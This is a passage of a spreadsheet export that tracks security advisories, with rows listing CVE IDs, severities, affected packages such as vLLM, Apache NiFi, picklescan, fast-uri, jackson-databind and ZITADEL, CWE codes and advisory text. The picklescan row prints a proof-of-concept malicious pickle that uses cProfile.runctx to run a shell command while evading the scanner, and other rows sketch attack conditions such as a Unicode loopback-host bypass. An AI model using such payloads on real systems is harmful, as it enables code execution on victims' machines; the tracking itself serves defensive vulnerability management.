This advisory has been withdrawn because it is a duplicate of GHSA-j828-28rj-hfhp. This link is maintained to preserve external references.
### Original Description
vLLM versions &gt;= 0.6.3 and &lt; 0.9.0 contain multiple regular expression denial of service (ReDoS) vulnerabilities. Several regex patterns — in vllm/lora/utils.py, the phi4mini tool parser, and the OpenAI-compatible serving chat endpoint — are susceptible to catastrophic backtracking. An attacker submitting crafted input with nested or repeated structures can trigger severe CPU consumption and performance degradation, resulting in denial of service.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-vfm7-4h43-gp6m</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44911</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.nifi:nifi-web-api</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>2.10.0</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>Authorization handling for component configuration verification requests in Apache NiFi 1.15.0 through 2.9.0 allows clients with read access to submit proposed configuration properties. The proposed properties override current configuration, enabling users with read access to invoke predefined verification methods with alternative settings. Apache NiFi installations that do not implement different levels of authorization for viewing and modifying component configuration are not subject to this vulnerability. Upgrading to Apache NiFi 2.10.0 is the recommended mitigation, requiring write access to submit configuration verification requests.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44911</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-62198</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr"/>
      <c r="F18" s="5" t="inlineStr"/>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.atlas:atlas-dashboardv2</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr">
        <is>
          <t>2.5.0</t>
        </is>
      </c>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr"/>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>An authenticated user can perform XSS.
This issue affects Apache Atlas versions 2.4.0 and earlier.
Users are recommended to upgrade to version 2.5.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-62198</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-66336</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="inlineStr"/>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>pip:doris-mcp-server</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr">
        <is>
          <t>0.6.1</t>
        </is>
      </c>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr"/>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>Apache Doris MCP Server contains a SQL injection vulnerability in a metadata query path. A user-controlled database name is directly interpolated into a SQL query, and the query is executed without passing the caller's authorization context. This may allow an authenticated attacker, or an anonymous attacker if authentication is disabled, to bypass SQL security validation and access metadata outside the intended database scope.
Affected users are recommended to upgrade to Doris version 0.6.1 or later, which fixes the issue.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-66336</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71378</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr"/>
      <c r="F20" s="5" t="inlineStr"/>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr"/>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using cProfile.runctx function, which is a built-in python library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to cProfile.runctx function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
```
import cProfile
class EvilCProfileRunctx:
    def __reduce__(self):
        # cProfile.runctx(cmd, globals, locals) -&gt; exec(cmd, ...)
        return cProfile.runctx, ("__import__('os').system('whoami')", None, None)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S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71378</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13676</t>
        </is>
      </c>
      <c r="D21" s="5" t="inlineStr"/>
      <c r="E21" s="5" t="inlineStr"/>
      <c r="F21" s="5" t="inlineStr"/>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr">
        <is>
          <t>2.4.2, 3.1.3, 4.0.1</t>
        </is>
      </c>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr"/>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-436, CWE-551</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` versions `&gt;= 2.3.1, &lt;= 4.0.0` fail to canonicalize Unicode/IDN hostnames for HTTP-family URLs. The IDN conversion path calls `URL.domainToASCII(...)` on the global WHATWG `URL` constructor, where that helper does not exist. The resulting `TypeError` is silently routed into `parsed.error`, but `parse()`, `normalize()`, and `equal()` all return with the host left in its original Unicode form.
For example, `http://127。0。0。1/` is treated by `fast-uri` as host `127。0。0。1`, while Node's WHATWG URL parser and `fetch()` canonicalize the same input to `127.0.0.1`.
Applications that use `fast-uri` to enforce host-based policy (denylists, loopback filtering, redirect validation, outbound proxy routing) before passing the same URL into Node's URL or `fetch()` consumers see a policy/use desync and can be steered to an unintended destination.
### Patches
Upgrade to `fast-uri` v4.0.1, v3.1.3, or v2.4.2
### Workarounds
None. Upgrade to the patched version.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13676</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39835</t>
        </is>
      </c>
      <c r="D22" s="5" t="inlineStr"/>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="inlineStr"/>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>go:golang.org/x/crypto</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>0.52.0</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr"/>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-476</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>SSH servers which use CertChecker as a public key callback without setting IsUserAuthority or IsHostAuthority could be caused to panic by a client presenting a certificate. CertChecker now returns an error instead of panicking when these callbacks are nil.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39835</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40983</t>
        </is>
      </c>
      <c r="D23" s="5" t="inlineStr"/>
      <c r="E23" s="5" t="inlineStr"/>
      <c r="F23" s="5" t="inlineStr"/>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>maven:io.micrometer:micrometer-core</t>
        </is>
      </c>
      <c r="M23" s="5" t="inlineStr">
        <is>
          <t>1.15.12, 1.16.6</t>
        </is>
      </c>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr"/>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>In Micrometer, it is possible for a user to provide specially crafted gRPC requests that may cause a denial-of-service (DoS) condition.
Affected versions:
Micrometer 1.16.0 through 1.16.5; 1.15.0 through 1.15.11.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40983</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40984</t>
        </is>
      </c>
      <c r="D24" s="5" t="inlineStr"/>
      <c r="E24" s="5" t="inlineStr"/>
      <c r="F24" s="5" t="inlineStr"/>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>maven:io.micrometer:micrometer-core, maven:io.micrometer:micrometer-jetty11, maven:io.micrometer:micrometer-jetty12</t>
        </is>
      </c>
      <c r="M24" s="5" t="inlineStr">
        <is>
          <t>1.15.12, 1.16.6</t>
        </is>
      </c>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr"/>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>In Micrometer, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.
Affected versions:
micrometer-core 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18; 1.9.0 through 1.9.17.
micrometer-jetty11 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18.
micrometer-jetty12 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40984</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48043</t>
        </is>
      </c>
      <c r="D25" s="5" t="inlineStr"/>
      <c r="E25" s="5" t="inlineStr"/>
      <c r="F25" s="5" t="inlineStr"/>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-codec-http2</t>
        </is>
      </c>
      <c r="M25" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr"/>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>### Impact
The `DelegatingDecompressorFrameListener` class orchestrates HTTP/2 decompression by embedding a per-stream `EmbeddedChannel` that runs the appropriate decompression codec (gzip, deflate, zstd) and forwards decompressed chunks to a wrapped listener. Each decompressed chunk is a pooled `ByteBuf` handed to an anonymous `ChannelInboundHandlerAdapter` tail handler, which becomes the sole owner responsible for releasing it.
A remote peer could send frames that would result in the flow-controller throwing and so trigger a resource leak which at the end might take down the whole JVM due OOME.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48043</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54513</t>
        </is>
      </c>
      <c r="D26" s="5" t="inlineStr"/>
      <c r="E26" s="5" t="inlineStr"/>
      <c r="F26" s="5" t="inlineStr"/>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>jackson-databind, fasterxml</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>maven:com.fasterxml.jackson.core:jackson-databind, maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M26" s="5" t="inlineStr">
        <is>
          <t>2.18.8, 2.21.4, 3.1.4</t>
        </is>
      </c>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr"/>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>## Summary
`BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray()` allowlists any array type based only on `clazz.isArray()`, without validating the array's component (element) type against the configured allowlist. A PTV built with `allowIfSubTypeIsArray()` plus an explicit concrete-type allowlist therefore still permits `EvilType[]` even though `EvilType` is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist.
## Impact
Applications using `BasicPolymorphicTypeValidator` with `allowIfSubTypeIsArray()` as a safeguard get no protection for concrete array component types; an attacker controlling JSON can instantiate non-allowlisted types via an array wrapper, re-opening the gadget-instantiation risk PTV is meant to prevent.
## Affected / Patched (verified via `git tag --contains`)
- 2.18 line: `&gt;= 2.10.0, &lt; 2.18.8` -&gt; fixed in **2.18.8**
- 2.19-2.21 line: `&gt;= 2.19.0, &lt; 2.21.4` -&gt; fixed in **2.21.4**
- 3.x line: `&gt;= 3.0.0, &lt; 3.1.4` -&gt; fixed in **3.1.4**
`PolymorphicTypeValidator` was added in 2.10.0 so vulnerability N/A for versions prior to that.
## Severity / CWE
Maintainer: significant. Reporter: HIGH. CWE-184 (Incomplete List of Disallowed Inputs); related CWE-502.
## Upstream fix
FasterXML/jackson-databind#5981; fix PR #5983 (`24529da`), 2.18 backport PR #5984 (`01d1692`). Released 2026-06-04 in 2.18.8 / 2.21.4 / 3.1.4.
## Credits
Omkhar Arasaratnam (@omkhar) - finder.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54513</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56340</t>
        </is>
      </c>
      <c r="D27" s="5" t="inlineStr"/>
      <c r="E27" s="5" t="inlineStr"/>
      <c r="F27" s="5" t="inlineStr"/>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr">
        <is>
          <t>0.13.0</t>
        </is>
      </c>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr"/>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-123, CWE-502, CWE-787</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>### Summary
The fix [here](https://github.com/vllm-project/vllm/pull/27204) for CVE-2025-62164 is not sufficient. The fix only disables prompt embeds by default rather than addressing the root cause, so the DoS vulnerability remains when the feature is enabled.
### Details
vLLM's pending change attempts to fix the root cause, which is the missing sparse tensor validation.  PyTorch (~v2.0) disables sparse tensor validation (specifically, sparse tensor invariants checks) by default for performance reasons.  vLLM is adding the sparse tensor validation to ensure indices are valid, non-negative, and within bounds.  These checks help catch malformed tensors.
### PoC
NA
### Impact
Current fix only added a flag to disable/enable prompt embeds, so by default, prompt embeds feature is disabled in vLLM, which stops DoS attacks through the embeddings.  However, It doesn’t address the problem when the flag is enabled and there is still potential for DoS attacks.
### Changes
* https://github.com/vllm-project/vllm/pull/30649</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56340</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56665</t>
        </is>
      </c>
      <c r="D28" s="5" t="inlineStr"/>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>go:github.com/zitadel/zitadel</t>
        </is>
      </c>
      <c r="M28" s="5" t="inlineStr">
        <is>
          <t>3.4.12, 4.15.2</t>
        </is>
      </c>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr"/>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>### Summary
A token lifecycle validation vulnerability was discovered in ZITADEL's external JWT Identity Provider (IdP) implementation
Specifically, within the validation pipeline, if an incoming JWT omits the `exp` claim entirely, the expiration block is silently skipped rather than rejected. The token is treated as valid forever.
Per the OIDC Core 1.0 specification, identity token validation pipelines must strictly handle and enforce session expiration. ZITADEL's silent acceptance of tokens missing these temporal constraints compromises session integrity.
### Impact
An attacker in possession of a token lacking an `exp` claim holds a permanent credential with no automatic expiration or revocation window.
### Affected Versions
Systems running one of the following versions are affected:
* **4.x**: `4.0.0` through `4.15.1` (including RC versions)
* **3.x**: `3.0.0` through `3.4.11` (including RC versions)
### Patches
The vulnerability has been addressed in the latest releases. ZITADEL now explicitly rejects tokens that lack an `exp` claim.
* **4.x**: Upgrade to $\ge$ [4.15.2](https://github.com/zitadel/zitadel/releases/tag/v4.15.2)
* **3.x**: Upgrade to $\ge$ [3.4.12](https://github.com/zitadel/zitadel/releases/tag/v3.4.12)
### Workarounds
The recommended solution is to update ZITADEL to a patched version.
If an immediate upgrade is not feasible, ensure at the upstream Identity Provider level that an external IdP explicitly includes the `exp` claim in all signed JWTs.
### Publication Note
This issue was originally disclosed as part of a unified security bulletin published under [GHSA-wxg7-w2v3-w38g](https://github.com/zitadel/zitadel/security/advisories/GHSA-wxg7-w2v3-w38g). To satisfy CVE Numbering Authority regulations regarding independently fixable logic flaws, the missing token expiration validation (`exp`) has been moved into this separate tracking entry so a distinct CVE ID can be correctly mapped to it.
### Questions
If there are any questions or comments about this advisory, send an email to [security@zitadel.com](mailto:security@zitadel.com)
### Credits
ZITADEL thanks [Android-Login-Analysis](https://github.com/Android-Login-Analysis), Jason Zhou and [Pedro Giglioti](https://github.com/Punisher100) for reporting this vulnerability.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56665</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56666</t>
        </is>
      </c>
      <c r="D29" s="5" t="inlineStr"/>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>go:github.com/zitadel/zitadel</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr">
        <is>
          <t>4.15.3</t>
        </is>
      </c>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr"/>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>### Summary
A flaw in the external identity provider handler allows unauthorized account linking to occur under specific administrative configurations. When auto-linking by email is enabled, ZITADEL checks that the local user's email is verified, but does not explicitly cross-check whether the incoming external identity provider (IdP) also verified that email address upstream.
### Impact
When a user logs in via an external identity provider, the system can automatically link them to an existing local account if their email addresses match. However, because the system fails to check if the external provider actually verified ownership of that email, a security risk is introduced if a loose or public provider is connected.
If an administrator enables email auto-linking for an external identity provider that allows anyone to sign up with an unverified email address, an attacker can exploit this behavior. By registering an account on that permissive provider using a victim's email address and logging in, the system will automatically link the attacker's federated identity to the victim's legitimate local account. This allows the attacker to log into the victim's account without requiring any interaction or confirmation from the victim.
This issue represents a configuration-dependent anomaly rather than an unconditioned attack vector. Because the scenario relies entirely on an explicit administrative choice to trust a permissive external directory and link accounts automatically based purely on email strings, the practical operational risk is classified as **Medium**. 
### Affected Versions
Systems running one of the following versions are affected:
* **4.x:** `4.0.0` through `4.15.2` (including RC versions)
* **3.x:** `3.0.0` through `3.4.12` (including RC versions)
### Patches
The vulnerability has been addressed in the latest releases. The patch resolves the issue by requiring that the external identity provider's email verification status is explicitly validated before allowing any automatic linking logic to proceed.
* **4.x**: Upgrade to $\ge$ [4.15.3](https://github.com/zitadel/zitadel/releases/tag/v4.15.3)
* **3.x**: Upgrade to $\ge$ [4.15.3](https://github.com/zitadel/zitadel/releases/tag/v4.15.3)
### Workarounds
If an immediate upgrade is not possible, implement one of the following mitigations:
* Disable auto-linking by email entirely by setting the option to `AUTO_LINKING_OPTION_UNSPECIFIED` on corresponding identity providers.
* Audit external IdP configurations and restrict email auto-linking strictly to trusted enterprise identity directories (e.g., corporate Okta or Azure AD) where email verification is strictly enforced and managed by corporate policy.
### Questions
If you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)
### Credits
Thanks to [Android-Login-Analysis](https://github.com/Android-Login-Analysis) and [Alejandro Yadlin](https://github.com/ayadlin) for reporting this vulnerability.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56666</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
